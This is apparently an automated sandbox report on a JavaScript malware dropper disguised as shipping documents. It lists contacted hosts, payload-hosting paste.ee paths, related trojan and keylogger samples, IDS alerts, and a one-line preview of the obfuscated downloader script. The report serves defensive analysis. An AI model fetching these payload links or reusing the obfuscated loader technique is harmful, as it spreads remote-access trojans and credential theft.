                                                                                                                              https://reallyfreegeoip.org/xml/powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high

                                                                                                                                World Map of Contacted IPs

                                                                                                                                • No. of IPs < 25%
                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                • 75% < No. of IPs

                                                                                                                                Public IPs

                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                23.186.113.60
                                                                                                                                		paste.eeReserved
                                                                                                                                		49466KLAYER-GLOBALNLfalse
                                                                                                                                104.21.112.1
                                                                                                                                		reallyfreegeoip.orgUnited States
                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                207.241.233.30
                                                                                                                                		ia801700.us.archive.orgUnited States
                                                                                                                                		7941INTERNET-ARCHIVEUSfalse
                                                                                                                                207.241.224.2
                                                                                                                                		archive.orgUnited States
                                                                                                                                		7941INTERNET-ARCHIVEUSfalse
                                                                                                                                158.101.44.242
                                                                                                                                		checkip.dyndns.comUnited States
                                                                                                                                		31898ORACLE-BMC-31898USfalse

                                                                                                                                General Information

                                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                                Analysis ID:1676212
                                                                                                                                Start date and time:2025-04-28 13:23:13 +02:00
                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                Overall analysis duration:0h 7m 30s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:full
                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                Number of analysed new started processes analysed:16
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:0
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • GSI enabled (Javascript)
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Sample name:Shipping Documents SI 694_pdf.js
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal100.troj.spyw.expl.evad.winJS@6/3@7/5
                                                                                                                                EGA Information:
                                                                                                                                • Successful, ratio: 50%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 97%
                                                                                                                                • Number of executed functions: 50
                                                                                                                                • Number of non-executed functions: 2
                                                                                                                                Cookbook Comments:
                                                                                                                                • Found application associated with file extension: .js
                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                • Excluded IPs from analysis (whitelisted): 184.29.183.29, 199.232.214.172, 172.202.163.200, 52.165.164.15, 40.69.42.241
                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                • Execution Graph export aborted for target MSBuild.exe, PID 6720 because it is empty
                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                Simulations

                                                                                                                                Behavior and APIs

                                                                                                                                TimeTypeDescription
                                                                                                                                07:24:23API Interceptor1x Sleep call for process: wscript.exe modified
                                                                                                                                07:24:31API Interceptor46x Sleep call for process: powershell.exe modified

                                                                                                                                Joe Sandbox View / Context

                                                                                                                                IPs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                23.186.113.60iiii Drawings_Tender No. UAE-UCPC-4389761110-2025.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • paste.ee/d/TsKngy4Q/0
                                                                                                                                Payment Asvice in Doc.VBE.vbeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • paste.ee/d/b6q9659k/0
                                                                                                                                Trasferire.VBS.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • paste.ee/d/kgugdgk0/0
                                                                                                                                NEW ORDER.jsGet hashmaliciousXWormBrowse
                                                                                                                                • paste.ee/d/Cw5xgE6z/0
                                                                                                                                Update.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                • paste.ee/d/foOP0g8Z/0
                                                                                                                                imagen Art#U00edculos DRUCK MAQUINARIA, S.L..jsGet hashmaliciousXWormBrowse
                                                                                                                                • paste.ee/d/gKNJ3Zbz/0
                                                                                                                                Art#U00edculos enumerados.jsGet hashmaliciousUnknownBrowse
                                                                                                                                • paste.ee/d/L8tHN98p/0
                                                                                                                                Update.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                • paste.ee/d/foOP0g8Z/0
                                                                                                                                Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbsGet hashmaliciousXWormBrowse
                                                                                                                                • paste.ee/d/scsGkGbH/0
                                                                                                                                pleaseviewstampedimageandconfirmourorder_Doc12234567754_678787899 pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • paste.ee/d/vTYVVp8W/0
                                                                                                                                104.21.112.1PO-010816-WA0002.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.6644win.mom/1pi9/
                                                                                                                                RFQ - PR No. 1024001116.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.drgnmoney-98.buzz/leg3/
                                                                                                                                UNPAID INVOICE No. 2025-02-839.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.drgnmoney-98.buzz/leg3/
                                                                                                                                Outstanding balance # invoice#260077.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.6644win.mom/hs6j/
                                                                                                                                signed purchase order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.6644win.mom/hs6j/
                                                                                                                                OMhA9jwfHRMr36F.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.896bt55fz.xyz/5fom/
                                                                                                                                Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.eczanem.shop/3ujc/
                                                                                                                                Details Of Our PO..exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.uqcdnvgr.biz/mfiy/
                                                                                                                                Order#072504.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.6644win.mom/hs6j/
                                                                                                                                z1RFQQUOTATION_PMT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.eczanem.shop/xh3x/

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                archive.org0.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 207.241.233.30
                                                                                                                                iiii Drawings_Tender No. UAE-UCPC-4389761110-2025.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 207.241.227.90
                                                                                                                                Payment Asvice in Doc.VBE.vbeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 207.241.233.30
                                                                                                                                Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).jsGet hashmaliciousAsyncRATBrowse
                                                                                                                                • 207.241.233.30
                                                                                                                                Trasferire.VBS.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 207.241.233.30
                                                                                                                                NEW ORDER.jsGet hashmaliciousXWormBrowse
                                                                                                                                • 207.241.233.30
                                                                                                                                Update.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                • 207.241.224.2
                                                                                                                                imagen Art#U00edculos DRUCK MAQUINARIA, S.L..jsGet hashmaliciousXWormBrowse
                                                                                                                                • 207.241.233.30
                                                                                                                                Art#U00edculos enumerados.jsGet hashmaliciousUnknownBrowse
                                                                                                                                • 207.241.227.90
                                                                                                                                Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbsGet hashmaliciousXWormBrowse
                                                                                                                                • 207.241.233.30
                                                                                                                                bg.microsoft.map.fastly.netMDE_File_Sample_d14a3b3d09e42ffd653d5e0e7df8a7eade5a9d49.zipGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 199.232.210.172
                                                                                                                                Handbook_V2_2025.pdfGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                • 199.232.214.172
                                                                                                                                0.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 199.232.210.172
                                                                                                                                hyirn.htaGet hashmaliciousUnknownBrowse
                                                                                                                                • 199.232.210.172
                                                                                                                                Pending_Post_Tax_Payments_Detail.pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                • 199.232.210.172
                                                                                                                                GLS- Notifica spedizione 99133137YL.vbeGet hashmaliciousXWormBrowse
                                                                                                                                • 199.232.210.172
                                                                                                                                cYRX4HPdCS.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                • 199.232.214.172
                                                                                                                                Jonathan Hope_Revised_Executed_Docs.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                • 199.232.210.172
                                                                                                                                c57s18lwKh.exeGet hashmaliciousAmadey, LummaC Stealer, RHADAMANTHYS, Vidar, XmrigBrowse
                                                                                                                                • 199.232.214.172
                                                                                                                                4QwoDIoVBZ.exeGet hashmaliciousXmrigBrowse
                                                                                                                                • 199.232.214.172
                                                                                                                                paste.eeiiii Drawings_Tender No. UAE-UCPC-4389761110-2025.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                awb_invoice_27_04_2025_0000000_pdf.vbsGet hashmaliciousXWormBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                d.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                z18awb_bl_invoi.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                Payment Asvice in Doc.VBE.vbeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                PO_66360_xlsx.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                PO_66360_Website_Products_xlsx.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                Trasferire.VBS.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                NEW ORDER.jsGet hashmaliciousXWormBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                awb_fedex_documents_delivery_24_04_2025_0000000000000_pdf.vbsGet hashmaliciousAsyncRATBrowse
                                                                                                                                • 23.186.113.60

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                INTERNET-ARCHIVEUS0.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 207.241.224.2
                                                                                                                                iiii Drawings_Tender No. UAE-UCPC-4389761110-2025.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 207.241.227.90
                                                                                                                                Payment Asvice in Doc.VBE.vbeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 207.241.224.2
                                                                                                                                Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).jsGet hashmaliciousAsyncRATBrowse
                                                                                                                                • 207.241.224.2
                                                                                                                                Trasferire.VBS.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 207.241.224.2
                                                                                                                                NEW ORDER.jsGet hashmaliciousXWormBrowse
                                                                                                                                • 207.241.224.2
                                                                                                                                Update.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                • 207.241.224.2
                                                                                                                                imagen Art#U00edculos DRUCK MAQUINARIA, S.L..jsGet hashmaliciousXWormBrowse
                                                                                                                                • 207.241.224.2
                                                                                                                                Art#U00edculos enumerados.jsGet hashmaliciousUnknownBrowse
                                                                                                                                • 207.241.224.2
                                                                                                                                Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbsGet hashmaliciousXWormBrowse
                                                                                                                                • 207.241.224.2
                                                                                                                                KLAYER-GLOBALNLiiii Drawings_Tender No. UAE-UCPC-4389761110-2025.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                awb_invoice_27_04_2025_0000000_pdf.vbsGet hashmaliciousXWormBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                d.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                z18awb_bl_invoi.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                Payment Asvice in Doc.VBE.vbeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                PO_66360_xlsx.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                PO_66360_Website_Products_xlsx.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                Trasferire.VBS.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                NEW ORDER.jsGet hashmaliciousXWormBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                awb_fedex_documents_delivery_24_04_2025_0000000000000_pdf.vbsGet hashmaliciousAsyncRATBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                CLOUDFLARENETUS#U00d6deme makbuzu.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 104.21.96.1
                                                                                                                                Dhl Tracking.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 104.21.32.1
                                                                                                                                DHL Express_AWB44633179800-708439321-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 104.21.96.1
                                                                                                                                DHL Express_AWB44633179800-708439321-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 104.21.96.1
                                                                                                                                https://u23728849.ct.sendgrid.net/ls/click?upn=u001.QKeiUoYgeY2KYwGmjIXAfMoTaj4Nnvt0JHgsLtlcz2UfGuDtytuwCirasTQRzX97w3WLynAUkD9SkgQixX42qKcu-2BiLS6NgynChnSafkw3lJ0d74qZtGAaSvJR7Wt-2FVwFlk8KGIda3aukVRLFum5jywkpqIu8wft6bdjRMD4R5TkfxG0g8jlHuovfi4V-2FlpA2iHJYr0nLbcX1KyzaisMlETE1I0nsBa1gfofJqVDkCX3Q6V8WCUAAz3nY39YA8M-2FweEQkp9D3p-2FzcNAKQZ4AUHgZcr5JTpDnLKE-2BSl-2Fm0he0jwXr9CsVQo4NOMYyXIZrVQ-2BcKCLX44GeGmXvYqJAxQ9BKZaitGq8mWwG1Q3NA2V7eHyzaUwJL8EtPNFODaTWfP4cgz2MLwK6ZVQBc2bIEjoynYxnYLI4bS834XIYd7T4Nv-2FHbur8pcaxH6NjiWFo7wAgsOHvCwDzzvxhtnSX5KvCmz1NhpdMBQCidHXl26JdFtmD8piumZYXO24L7Bs8QH5gb-2FaavNsTuUUP2qoIED-2BWSK-2BTzelUWGix9t73Av-2FIQHhL4SQW1aWnSXR2ERoj5R3M_uh1n4X9ryuy4jvO-2F6hDyLdXU2uROzYiMp-2FLu3Ah1qaxR5iX8m99nB4wWvAw2H5JnialtFY1flF6V6HJu-2F0dLA-2FLYpLYDtihlfiEmacMFRMP3i0o-2FpgnMM9ozZv-2FxF67vyg3lJ7Kk0t8-2F0WxZCV7X-2BePAX6MmrTF0Wi6nHDnLAsJX8M8rN487Y3xwXNfU7enzUUwOW4RFSgU-2FBrwF51RO2w-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.150.76
                                                                                                                                1745836265d7df539a2e797e51f86ef1d7e214cac62a6dd87910c00b65cc41f42987478d01970.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 104.21.80.1
                                                                                                                                https://gjirafa.com/Lajmet/Lajmi/18584957/8/Live-Flight-Tracker?u=https%3A%2F%2Fna4.it.com/gUV7JK4JK4UV7QR5CD1OP4bST6QR5AB0JK4ST6yMN3pST6tST6EF2bWX8EF2WX8YZ9ghOP4gWX8vOP4YZ9k&Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 104.26.0.156
                                                                                                                                PAYMENT ADVICE APRIL 2025.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 104.21.48.1
                                                                                                                                680f50bcd41b9.msiGet hashmaliciousUnknownBrowse
                                                                                                                                • 162.159.141.50
                                                                                                                                Handbook_V2_2025.pdfGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                • 104.26.0.100

                                                                                                                                JA3 Fingerprints

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                54328bd36c14bd82ddaa0c04b25ed9ad#U00d6deme makbuzu.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                Dhl Tracking.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                DHL Express_AWB44633179800-708439321-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                DHL Express_AWB44633179800-708439321-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                1745836265d7df539a2e797e51f86ef1d7e214cac62a6dd87910c00b65cc41f42987478d01970.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                PAYMENT ADVICE APRIL 2025.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                loper5105205736990.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                Factura_2025-04-28_2025827772425_V98115896.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                Cliento.exeGet hashmaliciousSheetRatBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                RicevutaBonificoSepa1745392212214#U00b7PDF.scr.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 104.21.112.1
                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0e1745836265d7df539a2e797e51f86ef1d7e214cac62a6dd87910c00b65cc41f42987478d01970.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                • 207.241.233.30
                                                                                                                                • 207.241.224.2
                                                                                                                                0.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                • 207.241.233.30
                                                                                                                                • 207.241.224.2
                                                                                                                                iiii Drawings_Tender No. UAE-UCPC-4389761110-2025.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                • 207.241.233.30
                                                                                                                                • 207.241.224.2
                                                                                                                                Invio Ordine accompagnatorio n. 20250428-70611 del 04282025 - C.E.F. Srl.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                • 207.241.233.30
                                                                                                                                • 207.241.224.2
                                                                                                                                awb_invoice_27_04_2025_0000000_pdf.vbsGet hashmaliciousXWormBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                • 207.241.233.30
                                                                                                                                • 207.241.224.2
                                                                                                                                loper5105205736990.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                • 207.241.233.30
                                                                                                                                • 207.241.224.2
                                                                                                                                oTl8rHdxTJ.exeGet hashmaliciousAsyncRAT, DcRat, GlorySprout, StormKittyBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                • 207.241.233.30
                                                                                                                                • 207.241.224.2
                                                                                                                                kjr8E1sTC2.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                • 207.241.233.30
                                                                                                                                • 207.241.224.2
                                                                                                                                Pending_Tax_Payment_Details.pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                • 207.241.233.30
                                                                                                                                • 207.241.224.2
                                                                                                                                174582408440ffc9977657cff17b5ac208a7763e2dd2260232615a0ead2d81e357b9a37c84265.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                • 207.241.233.30
                                                                                                                                • 207.241.224.2
                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1Order Request No. E0147-1-T1911.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                AWB 210229572045.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                iiii Drawings_Tender No. UAE-UCPC-4389761110-2025.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                FrRLbLZMuB.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                cYRX4HPdCS.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                Ss6PiW6BjJ.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, LummaC StealerBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                c57s18lwKh.exeGet hashmaliciousAmadey, LummaC Stealer, RHADAMANTHYS, Vidar, XmrigBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                Pl6q6O7NqM.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                8tXTOlPbMn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                8cyhcAt5qW.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                • 23.186.113.60

                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):64
                                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:NlllulhvnXz:NllU
                                                                                                                                MD5:13A5F687991893CCDFE198EC677D17AF
                                                                                                                                SHA1:542384358389E50E487BF95100E71B5CB40A8634
                                                                                                                                SHA-256:DCFE651EDD144DC36D9D358195D17E80FAEA258EF4146AD5C91F83B4BDA00B77
                                                                                                                                SHA-512:55CCC7DA45C19540A299912461AC492D1F078C4275A56DF6028FF10FEE0E78017A7012C155366465825959B33F5F668677DFD47B034E0924943BC597FD0F1D3A
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:@...e...................................8............@..........

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vi3ritig.bym.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0adrarq.mty.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:Unicode text, UTF-8 text, with very long lines (488), with CRLF line terminators
                                                                                                                                Entropy (8bit):5.420391653791411
                                                                                                                                TrID:
                                                                                                                                  File name:Shipping Documents SI 694_pdf.js
                                                                                                                                  File size:2'284 bytes
                                                                                                                                  MD5:e822f6aa3570eb13de7cd31d07d8cca0
                                                                                                                                  SHA1:36ec5a917df2a8c21fc775c25565b60d0d99da5b
                                                                                                                                  SHA256:67182a912dd8c9f738c203e4f666b3136dbe24239d1278e292155629a26a135c
                                                                                                                                  SHA512:6b42a0b52b3ef0a2eb810d4d58364000d0d5c17420aa6a70e77a56f7997b774cc31c4bd65e1eb559e58e50f63df685352e2aa5b7ce9cd26f6e8c349b7a48efdc
                                                                                                                                  SSDEEP:48:sXj/ENkA0ffj5AAjucf6V66APA9u2jgSkhjAbkwV9kK39kmN9k/RZ9krdvt:sXj/ENwffj5AAjucf6V66APA9u2jgSkC
                                                                                                                                  TLSH:8D4122D928CD76A74D9EF324B1EC8D2B81F86E5290CA690020209BC8730816E7D6298B
                                                                                                                                  File Content Preview:var maidenlike = "MS..............................i.........XML2.S..............................i.........erver..............................i.........XML..............................i.........HTTP".split("..............................i.........").join(

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:68d69b8bb6aa9a86

                                                                                                                                  Network Behavior

                                                                                                                                  Download Network PCAP: filteredfull

                                                                                                                                  Suricata IDS Alerts

                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2025-04-28T13:24:09.806195+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64968623.186.113.60443TCP
                                                                                                                                  2025-04-28T13:24:37.141219+02002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21207.241.233.30443192.168.2.649694TCP
                                                                                                                                  2025-04-28T13:24:38.345893+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.64969523.186.113.60443TCP
                                                                                                                                  2025-04-28T13:24:38.653437+02002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound123.186.113.60443192.168.2.649695TCP
                                                                                                                                  2025-04-28T13:24:38.653437+02002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)123.186.113.60443192.168.2.649695TCP
                                                                                                                                  2025-04-28T13:24:39.587683+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649696158.101.44.24280TCP

                                                                                                                                  Network Port Distribution

                                                                                                                                  • Total Packets: 777
                                                                                                                                  • 443 (HTTPS)
                                                                                                                                  • 80 (HTTP)
                                                                                                                                  • 53 (DNS)
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Apr 28, 2025 13:24:04.838357925 CEST49672443192.168.2.6204.79.197.203
                                                                                                                                  Apr 28, 2025 13:24:05.150145054 CEST49672443192.168.2.6204.79.197.203
                                                                                                                                  Apr 28, 2025 13:24:05.759504080 CEST49672443192.168.2.6204.79.197.203
